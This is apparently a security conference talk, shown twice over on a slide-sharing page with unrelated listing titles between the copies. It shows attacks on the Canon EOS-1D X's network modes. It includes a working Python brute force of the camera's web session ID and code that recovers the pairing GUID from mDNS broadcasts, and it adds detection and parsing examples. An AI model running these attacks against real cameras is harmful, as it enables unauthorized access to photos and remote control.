www.ernw.de
Paparazzi over IP
Daniel Mende
dmende@ernw.de
Who we are
¬ Old-school network geeks,
working as security researchers for
Germany based ERNW GmbH
  - Independent
  - Deep technical knowledge
  - Structured (assessment) approach
  - Business reasonable recommendations
  - We understand corporate
¬ Blog: www.insinuator.net
¬ Conference: www.troopers.de
5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2
Agenda
¬ Intro
¬ Transport Protocols
¬ Communication Modes & Attacks
¬ Conclusions
Intro
¬ A number of current high-end
cameras have network interfaces.
¬ We did some research into their
security and potential attack paths.
¬ In the following we focus on Canon's
new flagship EOS 1D X, but similar
problems might be found in other
models and from other vendors, too.
The Camera
Canon EOS-1D X
The Camera
¬ From Canon USA:
  - A built in Ethernet port allows for fast,
    easy transfer of images directly to a
    PC or via a network to clients from live
    events.
  - The EOS-1D X is compatible with the
    new WFT-E6A Wireless File
    Transmitter for wireless LAN transfer
    with the IEEE 802.11 a/b/g/n
    standards.
A Bit of Marketing
The Camera
The Ethernet Port
The Camera
WLAN Adapter
The Target
aka. Mr. Reuters
The Target
¬ One could get the real, unedited
images first.
¬ One could upload (bad) images.
¬ One could turn the camera into a
surveillance device.
What if
Transport
The underlying Protocols
Transport
¬ Wired LAN via built-in Ethernet
port or Wireless LAN via WFT-E6A.
¬ Standard TCP/IP (no IPv6, yet).
Traditional Attacks
¬ ARP spoofing is possible.
  - No “sticky” ARP entries
¬ ARP flooding at ~100 packets
per second DoSes the network stack.
¬ By the way, the stack also dies if IPv6
(multicast) is present.
Layer 2
Traditional Attacks
¬ TCP/IP is used for all network
communication.
¬ Established connections can be
killed via TCP-RST.
Layer 3/4
Communication Modes
Communication Modes
¬ FTP Upload Mode
¬ DLNA
¬ Built-in webserver
¬ EOS Utility
Overview
FTP Upload Mode
FTP Upload Mode
¬ Target server and credentials
configured on camera.
¬ Photos taken are uploaded to the
server immediately.
Mode of operation
FTP Upload Mode
¬ As FTP is clear text, credentials
can be sniffed.
¬ As well as the complete data
transmission
¬ Uploaded pictures can be extracted
from network traffic.
Downside
DLNA mode
DLNA mode
¬ Digital Living Network Alliance®
¬ UPnP used for discovery.
¬ DLNA guidelines for file formats,
encodings, resolutions.
¬ HTTP and XML used to access
media.
Overview
DLNA mode
¬ No authentication.
¬ No restrictions.
¬ Every DLNA client can download _all_
images.
¬ Your Browser could be a DLNA client.
Or somebody else's browser. For your
camera.
Cons
Built-in webserver
Always a good idea…
Built-in webserver
¬ Wireless File Transmitter Server
Mode.
¬ Canon USA:
“Use a web browser to capture,
view and download images
remotely”
Canon WFT Server
Built-in webserver
¬ Browser interface uses AJAX.
¬ Embedded webserver only capable
of HTTP GET method.
  - Every other request method is
    answered with a 404.
Canon WFT Server
Built-in webserver
¬ Authentication via HTTP Basic
(RFC 2617) on login page.
¬ Session cookie is used afterwards.
¬ Cookie looks like sessionID=40b1
  - 4 (!!!) byte Session ID
  - 65535 possible IDs
Authentication
Built-in webserver
¬ Session ID brute force
implemented in 6 lines of Python.
¬ Checking all possible IDs takes
about 20 minutes.
  - Embedded webserver is not that
    responsive.
import requests

target_uri = 'http://192.168.1.103/api/cam/lvoutput'
target_string = 'SESSION_ERR'
for i in range(0xffff):
    # progress output every 1000 IDs
    if i != 0 and i % 1000 == 0:
        print(str(i) + ' IDs checked')
    r = requests.get(target_uri, cookies={'sessionID': '%x' % i})
    # a response without SESSION_ERR means the ID belongs to a valid session
    if r.text.find(target_string) == -1:
        print('SessionID is : sessionID=%x' % i)
        break
Built-in webserver
¬ Full access to Live View, stored
photos and camera settings.
¬ You surf – We brute.
recap
Built-in webserver
¬ Camera in WFT Server mode.
¬ Valid session opened by user.
¬ Some minutes of time.
Requirements
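What the session ID brute force looks like from the network side, as an added example that is not part of the original slides: one client presents many different sessionID values and each one is answered with SESSION_ERR. The record layout, the threshold, the time window and the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict


def find_session_enumeration(records, max_distinct_failed=20, window=60.0):
    """Flag clients that had more than `max_distinct_failed` distinct
    sessionID values rejected within any `window` seconds.

    records: iterable of (timestamp_seconds, client_ip, session_id, body),
    an assumed layout, e.g. exported by a sensor in front of the camera.
    Returns {client_ip: highest number of distinct rejected IDs in a window}.
    """
    failed = defaultdict(list)  # client_ip -> [(ts, session_id)] of rejected IDs
    for ts, ip, sid, body in records:
        if 'SESSION_ERR' in body:
            failed[ip].append((ts, sid))

    flagged = {}
    for ip, events in failed.items():
        events.sort()
        counts = defaultdict(int)  # session_id -> occurrences inside the window
        start = 0
        worst = 0
        for ts, sid in events:
            counts[sid] += 1
            # drop events that fell out of the sliding window
            while ts - events[start][0] > window:
                old = events[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            worst = max(worst, len(counts))
        if worst > max_distinct_failed:
            flagged[ip] = worst
    return flagged


def build_sample():
    """Constructed sample traffic (documentation addresses, made-up IDs)."""
    records = []
    # legitimate browser: one valid session, plus a single stale cookie
    for t in range(0, 30, 3):
        records.append((float(t), '192.0.2.10', '40b1', 'OK'))
    records.append((31.0, '192.0.2.10', '1f03', 'SESSION_ERR'))
    # enumerating client: 200 consecutive IDs at roughly 55 requests/second,
    # the rate implied by 65535 IDs in about 20 minutes
    for i in range(200):
        records.append((40.0 + i / 55.0, '192.0.2.66', '%x' % i, 'SESSION_ERR'))
    return records


if __name__ == '__main__':
    for ip, n in find_session_enumeration(build_sample()).items():
        print('%s: %d distinct rejected session IDs in one window' % (ip, n))
```

A legitimate browser reuses one cookie value, so even a low threshold separates it from enumeration.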
EOS Utility mode
aka. I wanna be root
EOS Utility mode
The Utility
EOS Utility mode
¬ Allows remote control of all non-
manual camera functions.
¬ Pictures can be up- and
downloaded.
¬ Possibly even more (sound
recording anyone?)
Overview
EOS Utility mode
¬ SSDP and MDNS used for
discovery.
¬ PTP/IP used for communication.
¬ Needs initial camera <-> software
pairing.
Technical
EOS Utility mode
¬ At first use, credentials need to be
exchanged between the camera
and the client software.
¬ Camera must be put into pairing
mode via camera menu.
¬ Camera signals the need for
pairing via MDNS.
Pairing
EOS Utility mode
¬ Client software connects to camera
via PTP/IP.
¬ PTP/IP Authentication is
successful regardless of the
credentials.
¬ Credentials (hostname, GUID) are
stored on the camera.
Pairing
PTP/IP
Feels like USBoIP )-:
PTP/IP
¬ Picture Transfer Protocol over
Internet Protocol.
¬ ISO 15740.
¬ Standardized by International
Imaging Industry Association
PTP/IP
¬ Wrapper for PTP with header:
4 byte length (little endian)
4 byte type (little endian)
data
Packet format
PTP/IP
Layering
PTP/IP
¬ PTPIP_INIT_COMMAND_REQUEST
  - Includes authentication data:
    16 byte GUID
    hostname string
Authentication
PTPIP_INIT_COMMAND_REQUEST
2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e
a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00
65 00 72 00 00 00 00 00 01 00
Packet length = 42 bytes
Packet type = 0x01 = PTPIP_INIT_COMMAND_REQUEST
GUID
Hostname = “server” in UTF-16
Trailer
PTP
PTP
¬ Picture Transfer Protocol
¬ Standardized by International
Imaging Industry Association
¬ ISO 15740
¬ Lots of proprietary vendor
extensions.
Explained
PTP
¬ Designed for use over USB
¬ Fixed length
¬ 2 byte Msg Code
¬ 4 byte Session ID
¬ 4 byte Transaction ID
¬ 5 times 4 byte Parameter or Data
Packet format
PTP
¬ Lots of standardized codes, like:
  - PTP_GetDeviceInfo
  - PTP_OpenSession
  - PTP_CloseSession
  - PTP_GetStorageIDs
¬ Also vendor-specific codes, like:
  - PTP_CANON_GetCustomizeSpec
  - PTP_CANON_GetCustomizeItemInfo
Message Codes
PTP
¬ Thankfully there are some
implementations around.
¬ We decided to go with libgphoto2.
¬ Basic PTP/IP support is included
as well.
Use of
The Attack
aka. gotcha
Attack
¬ Client hostname is easily
discoverable, but not needed.
  - Camera also accepts connections with
    a different hostname.
¬ GUID unknown to client software.
¬ Obfuscated GUID is broadcast by
the cam via UPnP.
Getting the Credentials
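# mdns_info: the mDNS service info object received for the camera
tmp = mdns_info.getProperties()['tid.canon.com'].split('-')
guid = []
# split a hex string into byte pairs and reverse their order
l = lambda s: [s[i:i+2] for i in range(0, len(s), 2)][::-1]
for i in range(0, 3):
    guid += l(tmp[i])
guid += tmp[3]
guid += tmp[4]
guid = "".join(guid)
# result: guid = eb7a789d69cb644ea3e0fc96ef597942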
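A dissector for the PTPIP_INIT_COMMAND_REQUEST dump shown earlier, as an added example that is not code from the original slides. It also goes one step beyond the snippet above: the byte swap there is the same reordering as the mixed-endian text form of a GUID, so Python's uuid module can express it. The text-form GUID below is derived from the packet bytes on the slide, not captured from a camera, and the function names are hypothetical.

```python
import struct
import uuid

PTPIP_INIT_COMMAND_REQUEST = 0x01

# Bytes copied from the PTPIP_INIT_COMMAND_REQUEST slide.
INIT_CMD_REQ = bytes.fromhex(
    "2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e "
    "a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00 "
    "65 00 72 00 00 00 00 00 01 00"
)


class PtpIpError(ValueError):
    """Raised when a buffer is not a well-formed PTP/IP packet."""


def parse_ptpip_header(buf):
    """Split off the 8 byte PTP/IP header: 4 byte length, 4 byte type (LE)."""
    if len(buf) < 8:
        raise PtpIpError("buffer shorter than the 8 byte header")
    length, ptype = struct.unpack_from("<II", buf, 0)
    # the length field counts the header itself and must fit the buffer
    if length < 8 or length > len(buf):
        raise PtpIpError("length field %d does not fit %d captured bytes"
                         % (length, len(buf)))
    return length, ptype, buf[8:length]


def parse_init_command_request(buf):
    """Return length, type, GUID, hostname and trailer of an init request."""
    length, ptype, payload = parse_ptpip_header(buf)
    if ptype != PTPIP_INIT_COMMAND_REQUEST:
        raise PtpIpError("unexpected packet type 0x%02x" % ptype)
    if len(payload) < 16 + 2:
        raise PtpIpError("payload too short for GUID and hostname")
    guid = payload[:16]
    # hostname: UTF-16LE code units up to a 16 bit zero terminator
    pos = 16
    while pos + 2 <= len(payload) and payload[pos:pos + 2] != b"\x00\x00":
        pos += 2
    if pos + 2 > len(payload):
        raise PtpIpError("hostname is not terminated")
    return {
        "length": length,
        "type": ptype,
        "guid": guid.hex(),
        "hostname": payload[16:pos].decode("utf-16-le"),
        "trailer": payload[pos + 2:].hex(),  # the slide only calls this "Trailer"
    }


def guid_text_to_wire(text):
    """Text GUID (first three groups byte-swapped on the wire) -> wire hex."""
    return uuid.UUID(text).bytes_le.hex()


def guid_wire_to_text(wire_hex):
    """Wire hex as carried in the packet -> text GUID."""
    return str(uuid.UUID(bytes_le=bytes.fromhex(wire_hex)))


def advertised_guid_matches(advertised_text, packet):
    """True if a GUID seen in discovery traffic is the one used to authenticate."""
    return guid_text_to_wire(advertised_text) == parse_init_command_request(packet)["guid"]


if __name__ == "__main__":
    fields = parse_init_command_request(INIT_CMD_REQ)
    print(fields)
    print(guid_wire_to_text(fields["guid"]))
```

When `advertised_guid_matches` returns true for discovery and authentication traffic captured on the same segment, the pairing credential is visible to every host that receives the announcement.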
The Attack
¬ Camera only allows one
connection.
¬ Already connected client needs to
be disconnected.
¬ TCP-RST the established PTP/IP
connection.
Connecting to the Camera
Attack
¬ Listen for the Cam on MDNS.
¬ De-obfuscate Authentication data.
¬ Disconnect connected Client
Software.
¬ Connect via PTP/IP.
¬ Have Phun (-;
Process
Attack outlined
¬ Photographer uses hotel / Starbucks
WLAN, which isn’t unlikely during
events (think of the Grammy Awards
a few days ago).
¬ Almost anybody in the same LAN
can download the images from the
camera (and even more).
So you can write it down
Countermeasures
¬ Enable network functionality only
in trusted Networks.
¬ Use WPA and a secure passphrase
for (your trusted) WLAN.
Conclusions
¬ High-end cameras are yet another daily
life item equipped with networking
capabilities incl. full-blown IP stacks.
¬ Once more, their device-specific network
technologies have been designed and
implemented without (too much) security
in mind.
¬ Again, this leads to (classes of) attacks
previously unknown to their non-
networked counterparts.
Next Steps
New series of DSLRs (EOS 6D)
  - Built-in Wireless Access Point
  - New communication protocol for
    iOS/Android App
New series of camcorders (XA20, XA25)
There’s never enough time…
THANK YOU… ...for yours!
Questions?
© ERNW GmbH
| Breslauer Str.
28 | D-69124 66

BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
What is Binary Language? Computer Number Systems
What is Binary Language?  Computer Number SystemsWhat is Binary Language?  Computer Number Systems
What is Binary Language? Computer Number Systems
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 

[HES2013] Paparazzi over ip by Daniel Mende

  • 2. www.ernw.de Who we are
      ¬ Old-school network geeks, working as security researchers for Germany-based ERNW GmbH
          - Independent
          - Deep technical knowledge
          - Structured (assessment) approach
          - Business reasonable recommendations
          - We understand corporate
      ¬ Blog: www.insinuator.net
      ¬ Conference: www.troopers.de
      5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2
  • 3. Agenda
      ¬ Intro
      ¬ Transport Protocols
      ¬ Communication Modes & Attacks
      ¬ Conclusions
  • 4. Intro
      ¬ A number of current high-end cameras have network interfaces.
      ¬ We did some research into their security and potential attack paths.
      ¬ In the following we focus on Canon's new flagship EOS 1D X, but similar problems might be found in other models of other vendors, too.
  • 5. The Camera: Canon EOS-1D X
  • 6. The Camera: A Bit of Marketing
      ¬ From Canon USA:
          - A built in Ethernet port allows for fast, easy transfer of images directly to a PC or via a network to clients from live events.
          - The EOS-1D X is compatible with the new WFT-E6A Wireless File Transmitter for wireless LAN transfer with the IEEE 802.11 a/b/g/n standards.
  • 7. The Camera: The Ethernet Port
  • 8. The Camera: WLAN Adapter
  • 9. The Target: aka. Mr. Reuters
  • 10. The Target: What if
      ¬ One could get the real, unedited images first.
      ¬ One could upload (bad) images.
      ¬ One could turn the camera into a surveillance device.
  • 12. Transport
      ¬ Wired LAN via built-in Ethernet port or Wireless LAN via WFT-E6A.
      ¬ Standard TCP/IP (no IPv6, yet).
  • 13. Traditional Attacks: Layer 2
      ¬ ARP-spoofing possible.
          - No “sticky” ARP entries
      ¬ ARP-flooding with ~100 packets per second DoSes the network stack.
      ¬ Btw. the stack also dies if IPv6 (multicast) is present.
  • 14. Traditional Attacks: Layer 3/4
      ¬ TCP/IP is used for all network communication.
      ¬ Established connections can be killed via TCP-RST.
  • 16. Communication Modes: Overview
      ¬ FTP Upload Mode
      ¬ DLNA
      ¬ Built-in webserver
      ¬ EOS Utility
  • 18. FTP Upload Mode: Mode of operation
      ¬ Target server and credentials configured on camera.
      ¬ Photos taken are uploaded to the server immediately.
  • 19. FTP Upload Mode: Downside
      ¬ As FTP is clear text, credentials can be sniffed.
      ¬ As well as the complete data transmission
      ¬ Uploaded pictures can be extracted from network traffic.
  • 20. FTP Upload Mode
  • 21. FTP Upload Mode
  • 23. DLNA mode: Overview
      ¬ Digital Living Network Alliance®
      ¬ UPnP used for discovery.
      ¬ DLNA guidelines for file formats, encodings, resolutions.
      ¬ HTTP and XML used to access media.
  • 24. DLNA mode: Cons
      ¬ No authentication.
      ¬ No restrictions.
      ¬ Every DLNA client can download _all_ images.
      ¬ Your Browser could be a DLNA client. Or somebody else's browser. For your camera.
  • 26. Built-in webserver: Canon WFT Server
      ¬ Wireless File Transmitter Server Mode.
      ¬ Canon USA: “Use a web browser to capture, view and download images remotely”
  • 27. Built-in webserver: Canon WFT Server
      ¬ Browser interface uses AJAX.
      ¬ Embedded webserver only capable of HTTP GET method.
          - Every other request method is answered with a 404.
  • 28. Built-in webserver: Authentication
      ¬ Authentication via HTTP Basic (RFC 2617) on login page.
      ¬ Session cookie is used afterwards.
      ¬ Cookie looks like sessionID=40b1
          - 4 (!!!) byte Session ID
          - 65535 possible IDs
  • 29. Built-in webserver
      ¬ Session ID brute force implemented in 6 lines of Python.
      ¬ To check for all possible IDs takes about 20 minutes.
          - Embedded Webserver is not that responsive.
  • 30.
      import requests
      target_uri = 'http://192.168.1.103/api/cam/lvoutput'
      target_string = 'SESSION_ERR'
      for i in xrange(0xffff):
          if (i != 0 and i%1000 == 0):
              print str(i) + 'IDs checked'
          r = requests.get(target_uri, cookies={'sessionID': '%x' %i})
          if r.text.find(target_string) == -1:
              print 'SessionID is : sessionID=%x' %i
              break
  • 32. Built-in webserver: recap
      ¬ Full access to Live View, stored photos and camera settings.
      ¬ You surf – We brute.
  • 33. Built-in webserver: Requirements
      ¬ Camera in WFT Server mode.
      ¬ Valid session opened by user.
      ¬ Some minutes of time.
  • 35. EOS Utility mode: The Utility
  • 36. EOS Utility mode: The Utility
  • 37. EOS Utility mode: Overview
      ¬ Allows remote control of all non-manual camera functions.
      ¬ Pictures can be up- and downloaded.
      ¬ Possibly even more (sound recording anyone?)
  • 38. EOS Utility mode: Technical
      ¬ SSDP and MDNS used for discovery.
      ¬ PTP/IP used for communication.
      ¬ Needs initial camera <-> software pairing.
  • 39. EOS Utility mode: Pairing
      ¬ At first use, credentials need to be exchanged between the camera and the client software.
      ¬ Camera must be put into pairing mode via camera menu.
      ¬ Camera signals the need for pairing via MDNS.
  • 41. EOS Utility mode: Pairing
  • 42. EOS Utility mode: Pairing
      ¬ Client software connects to camera via PTP/IP.
      ¬ PTP/IP Authentication is successful regardless of the credentials.
      ¬ Credentials (hostname, GUID) are stored on the camera.
  • 44. PTP/IP
      ¬ Picture Transfer Protocol over Internet Protocol.
      ¬ ISO 15740.
      ¬ Standardized by International Imaging Industry Association
  • 45. PTP/IP: Packet format
      ¬ Wrapper for PTP with header:
          - 4 byte length (little endian)
          - 4 byte type (little endian)
          - data
  • 46. PTP/IP: Layering
  • 47. PTP/IP: Authentication
      ¬ PTPIP_INIT_COMMAND_REQUEST
          - Includes authentication data:
              - 16 byte GUID
              - hostname string
  • 48. PTPIP_INIT_COMMAND_REQUEST
      2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e a3 e0 fc 96 ef 59 79 42
      73 00 65 00 72 00 76 00 65 00 72 00 00 00 00 00 01 00
          - Packet length = 42 byte
          - Packet type = 0x01 = PTPIP_INIT_COMMAND_REQUEST
          - GUID
          - Hostname = “server” @ utf16
          - Trailer
  • 50. PTP: Explained
      ¬ Picture Transfer Protocol
      ¬ Standardized by International Imaging Industry Association
      ¬ ISO 15740
      ¬ Lots of proprietary vendor extensions.
  • 51. PTP: Packet format
      ¬ Designed for use over USB
      ¬ Fixed length
      ¬ 2 byte Msg Code
      ¬ 4 byte Session ID
      ¬ 4 byte Transaction ID
      ¬ 5 times 4 byte Parameter or Data
  • 52. PTP: Message Codes
      ¬ Lots of standardized codes like:
          - PTP_GetDeviceInfo
          - PTP_OpenSession
          - PTP_CloseSession
          - PTP_GetStorageIDs
      ¬ Also vendor-specific codes like:
          - PTP_CANON_GetCustomizeSpec
          - PTP_CANON_GetCustomizeItemInfo
  • 53. PTP: Use of
      ¬ Thankfully there are some implementations around.
      ¬ We decided to go with libgphoto2.
      ¬ Basic PTP/IP support is included as well.
  • 55. Attack: Getting the Credentials
      ¬ Client hostname easily discoverable, but not needed.
          - Camera also accepts connections with a different hostname.
      ¬ GUID unknown to client software.
      ¬ Obfuscated GUID is broadcast by the cam via UPNP.
  • 57.
      tmp = mdns_info.getProperties()['tid.canon.com'].split('-')
      guid = []
      l = lambda s: [ s[i:i+2:] for i in xrange(0,len(s),2) ][::-1]
      for i in xrange(0,3):
          guid += l(tmp[i])
      guid += tmp[3]
      guid += tmp[4]
      guid = "".join(guid)

      guid = eb7a789d69cb644ea3e0fc96ef597942
  • 58. The Attack: Connecting to the Camera
      ¬ Camera only allows one connection.
      ¬ Already connected client needs to be disconnected.
      ¬ TCP-RST the established PTP/IP connection.
  • 59. Attack: Process
      ¬ Listen for the Cam on MDNS.
      ¬ De-obfuscate Authentication data.
      ¬ Disconnect connected Client Software.
      ¬ Connect via PTP/IP.
      ¬ Have Phun (-;
  • 61. Attack outlined: So you can write it down
      ¬ Photographer uses hotel / Starbucks WLAN, which isn’t unlikely during events (think of Grammy Awards a few days ago).
      ¬ Almost anybody in the same LAN can download the images from the camera (and even more).
  • 62. Countermeasures
      ¬ Enable network functionality only in trusted networks.
      ¬ Use WPA and a secure passphrase for (your trusted) WLAN.
  • 63. Conclusions
      ¬ High-end cameras are yet another daily life item equipped with networking capabilities incl. full-blown IP stacks.
      ¬ Once more, their device-specific network technologies have been designed and implemented without (too much) security in mind.
      ¬ Again, this leads to (classes of) attacks previously unknown to their non-networked counterparts.
  • 64. Next Steps
      ¬ New series of DSLRs (EOS 6D)
          - Built-in Wireless Access Point
          - New communication protocol for iOS/Android app
      ¬ New series of camcorders (XA20, XA25)
  • 65. There’s never enough time… THANK YOU… ...for yours!
  • 66. Questions? © ERNW GmbH | Breslauer Str. 28 | D-69124
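
A defensive counterpart to the session ID weakness on slides 28 to 33, added here as an example and not part of the original slides: it scans HTTP request records for one client cycling through many distinct sessionID cookie values, and for a session ID that is accepted from a second client address. The record layout, thresholds, addresses and sample traffic are constructed assumptions; only the cookie name sessionID, the value 40b1 and the SESSION_ERR marker come from the slides.

```python
from collections import defaultdict

# Constructed record layout (assumption): (epoch_seconds, client_ip, session_id, marker).
# marker is "SESSION_ERR" when the camera rejected the cookie, "OK" otherwise.
WINDOW_SECONDS = 60       # look-back window for rejected IDs (assumed threshold)
MAX_REJECTED_IDS = 20     # distinct rejected IDs tolerated per client per window (assumed)


def detect(records):
    """Return (enumerators, takeovers) found in time-ordered request records."""
    rejected = defaultdict(list)   # client_ip -> [(ts, session_id)] still inside the window
    owner = {}                     # session_id -> first client_ip it was accepted from
    enumerators, takeovers = set(), []
    for ts, ip, sid, marker in records:
        if marker == "SESSION_ERR":
            recent = [(t, s) for t, s in rejected[ip] if ts - t < WINDOW_SECONDS]
            recent.append((ts, sid))
            rejected[ip] = recent
            if len({s for _, s in recent}) > MAX_REJECTED_IDS:
                enumerators.add(ip)
        else:
            first = owner.setdefault(sid, ip)
            if first != ip:        # same session ID now valid from another address
                takeovers.append((sid, first, ip))
    return enumerators, takeovers


def sample_records():
    """Constructed traffic: one legitimate user plus one client walking the ID space."""
    recs = [(0, "192.0.2.10", "40b1", "OK")]                  # user holds session 40b1
    for i in range(0x4000, 0x40b1):                            # 177 rejected cookie values
        recs.append((1 + (i - 0x4000) // 50, "192.0.2.66", "%x" % i, "SESSION_ERR"))
    recs.append((5, "192.0.2.66", "40b1", "OK"))               # live ID accepted elsewhere
    recs.append((6, "192.0.2.10", "40b1", "OK"))               # user keeps browsing
    return recs


if __name__ == "__main__":
    enum, take = detect(sample_records())
    print("clients enumerating session IDs:", sorted(enum))
    print("session IDs accepted from a second address:", take)
```

Clients behind a shared NAT address can trigger the second check legitimately, so treat it as a lead rather than proof.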
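
The packet layout from slides 45 to 48 as a small parser, added here as an example for traffic analysis and not code from the original slides or from libgphoto2. It assumes the hostname ends with a two-byte NUL and that the trailer is the final four bytes; the slide only labels the fields in order. The guid_uuid field renders the same 16 bytes with Python's bytes_le layout, which applies the same byte swap to the first three groups as the slide 57 snippet.

```python
import struct
import uuid

# Bytes exactly as shown on slide 48 (PTPIP_INIT_COMMAND_REQUEST).
SLIDE_48_HEX = (
    "2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e a3 e0 fc 96 ef 59 79 42 "
    "73 00 65 00 72 00 76 00 65 00 72 00 00 00 00 00 01 00"
)
PTPIP_INIT_COMMAND_REQUEST = 0x01   # packet type value given on slide 48


def parse_init_command_request(raw):
    """Split one PTP/IP Init Command Request into the fields named on slides 45 to 48."""
    if len(raw) < 8:
        raise ValueError("shorter than the 8 byte PTP/IP header")
    length, ptype = struct.unpack_from("<II", raw, 0)      # both little endian
    if length != len(raw):
        raise ValueError("length field %d does not match %d bytes" % (length, len(raw)))
    if ptype != PTPIP_INIT_COMMAND_REQUEST:
        raise ValueError("unexpected packet type 0x%02x" % ptype)
    if length < 8 + 16 + 2 + 4:
        raise ValueError("too short for GUID, hostname terminator and trailer")
    guid = raw[8:24]
    # Hostname: UTF-16LE code units up to the first 00 00 terminator (assumed layout).
    end = 24
    while end + 2 <= length - 4 and raw[end:end + 2] != b"\x00\x00":
        end += 2
    if raw[end:end + 2] != b"\x00\x00" or end + 2 != length - 4:
        raise ValueError("hostname not terminated directly before the trailer")
    return {
        "length": length,
        "type": ptype,
        "guid_hex": guid.hex(),
        # Same 16 bytes read as a mixed-endian UUID (first three groups byte-swapped).
        "guid_uuid": str(uuid.UUID(bytes_le=guid)),
        "hostname": raw[24:end].decode("utf-16-le"),
        "trailer": raw[end + 2:].hex(),
    }


if __name__ == "__main__":
    for name, value in parse_init_command_request(bytes.fromhex(SLIDE_48_HEX)).items():
        print("%-10s %s" % (name, value))
```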